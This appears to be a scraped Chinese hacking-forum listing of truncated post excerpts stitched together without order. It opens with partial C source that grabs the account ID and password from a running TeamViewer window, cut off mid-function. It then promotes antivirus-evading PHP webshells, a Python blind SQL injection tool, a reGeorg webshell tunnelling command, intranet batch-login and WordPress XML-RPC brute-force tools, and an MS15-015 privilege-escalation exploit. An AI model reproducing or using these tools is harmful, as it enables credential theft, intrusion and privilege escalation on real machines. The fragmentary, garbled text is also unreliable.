一件获取运行中的TeamViewer的账号和密码(附源码)

#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <iostream>#pragma comment( lib, "kernel32" )#pragma comment( lib, "user32" )
 int status = 0;
 BOOL CALLBACK EnumMainTVWindow(HWND hwnd, LPARAM lParam){
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "Allow Remote Control") != NULL)


PHP Hacker代码审计秘籍

本文不是 PHP 教程,本文只针对 PHP 的各种奇淫技巧进行整理和证明,在进行渗透测试(WEB 安全)的学习中,经常需要涉及到 PHP 编程,或者 PHP 编写 Webshell 或者一句话木马,一般的 PHP 马经常被各种软件发现被杀。与此同时,网络经常流传一些免杀马(当然免杀一句话很有可能藏后门大家都是知道的),那么那些免杀是怎么做出来的?打开看,可能就是非常难看难以阅读的 PHP 代码(为了混淆各种杀软的侦察)。 

当然,怎么样写出那种奇奇怪怪的东西呢?这就取决于你对 PHP 这门语言的了解程度:你是一个 PHP 开发者,通过 PHP 培训获得一定的技能?还是一个渗透测试人员,通过平时在渗透测试过程中接触 PHP,查看 PHP 官方手册学习 PHP。   

嗯……不管你是怎么样的契机接触了 PHP,并且看到了这篇文章,我都希望你看到这篇文章的时候,能够知道一些之前不知道的东西;或者你都对这些技巧了然于胸,能够帮助你回忆这些很有趣的 PHP Trick。


延迟注入工具(python)

延迟注入工具(python)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 延迟注入工具
import urllib2
import time
import socket
import threading
import req

代码审计入门总结

0x00 简介


之前看了seay写的PHP代码审计的书,全部浏览了一遍,作为一个代码审计小白,希望向一些和我一样的小白的人提供一下我的收获,以及一个整体的框架和常见漏洞函数。这也算是这本书的一个学习笔记吧,可以结合我捋顺的思路来看这本书。: )

webshell下的代理脚本reGeorg

$ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp


内网批量测试登录机器工具,并且dir 目标机器c盘(改版源码)

这个比之前发的那个,更加稳定,修正了一些BUG,而且能够DIR 远程机器盘符然后在写入到文件里。

Wordbrutepress:针对WordPress XML-RPC的大型暴力破解攻击工具

获取运行中的TeamViewer的账号和密码

获取运行中的TeamViewer的账号和密码--中文版

222a8582-70a4-4882-8d25-ec57a12e9477.png

MS15-015提权0day 源码+exp

从project zero看到的漏洞,是我本人最喜欢最喜欢的逻辑漏洞,利用方式简单明了。
漏洞影响08 r2/2012/12 r2,需要有SeAssignPrimaryTokenPrivilege才可以触发。不过很幸运,iis/sqlserver的虚拟帐户、默认的network service和local service都具有这个特权,所以在shell上或sa上用着和其他exp没什么区别。

MS15-015提权